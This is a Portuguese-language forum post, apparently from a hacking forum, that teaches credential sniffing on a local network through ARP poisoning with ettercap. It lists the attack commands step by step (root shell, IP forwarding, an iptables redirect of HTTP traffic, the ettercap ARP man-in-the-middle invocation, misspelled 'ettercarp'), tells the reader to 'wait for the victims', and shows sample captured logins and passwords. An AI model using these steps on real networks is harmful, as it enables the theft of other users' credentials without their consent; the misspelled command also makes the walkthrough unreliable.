SNIFFING COM SIMPLES ETTERCAP [PEGANDO SENHAS] (MITM)

Post Reply
User avatar
romano1337
Expert
Posts: 2
Joined: Wed Oct 25, 2017 8:11 pm
x 2

SNIFFING COM SIMPLES ETTERCAP [PEGANDO SENHAS] (MITM)

Post by romano1337 » Wed Oct 25, 2017 8:28 pm

Bom. Para iniciar meu primeiro ensinamento gostaria de compartilhar o ettercap, ferramenta antiga, porem muito funcional ainda!

Função: Capturar post datas e outras informações de sua rede local.
Tipos de informações> Emails, senhas, usuários, ip dos hosts.. ETC!

Vamos usar o metodo ARP poisoning (Aonde que todo o tráfego será apontado para você capturando todos dados!)
No caso, eu uso ParrotSec (Linux Debian - Distro Pentesnting) Página do sistema: https://www.parrotsec.org/
Esse metodo pode se aplicar em redes ETH0 e WLAN0 (Cabo ou Wireless)
No caso, esse metodo que vou ensinar está sem o sslstrip, que burla o https, no caso só irá funcionar com http!

(METODO POR TERMINAL)

Comandos:

Code: Select all

$ su
(Ativar o modo root)

Code: Select all

$ sysctl -w net.ipv4.ip_forward=1
(Ira liberar o repasse de pacotes na máquina para você)

Code: Select all

$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 4003
-t : Tabela do Firewall;
-p : Protocolo;
--dport : Porta de destino;
-j : (jump) ou simplesmente alvo;
--to-port : Redirecionar para uma porta especifica.
(Este comando, ira mudar a porta do tráfego para 4003 (ou outra que você quiser))

Code: Select all

$ ettercarp -TqM ARP:REMOTE
(Iniciará o sniffing em metodo ARP)
PRONTO! SÓ AGUARDAR AS VÍTIMAS!

FORMA DE RESULTADO:
2017-10-15 192.168.0.1:8080 USER>[email protected] PASS> Teste123 Data (teste.com):
login=romanosecurity%40teste.com&passwd=Teste123

IRÁ APARECER ALGO PARECIDO!

No próximo irei ensinar por Ettercap GUI (Interface gráfica)
, RomanoSecurity 2017
1 x
RomanoSecurity, 2011 - 2017
Não deixe o conhecimento virar lembrança... Aplique! E o resultado virá em massa, de pouco em pouco.

Image

Post Reply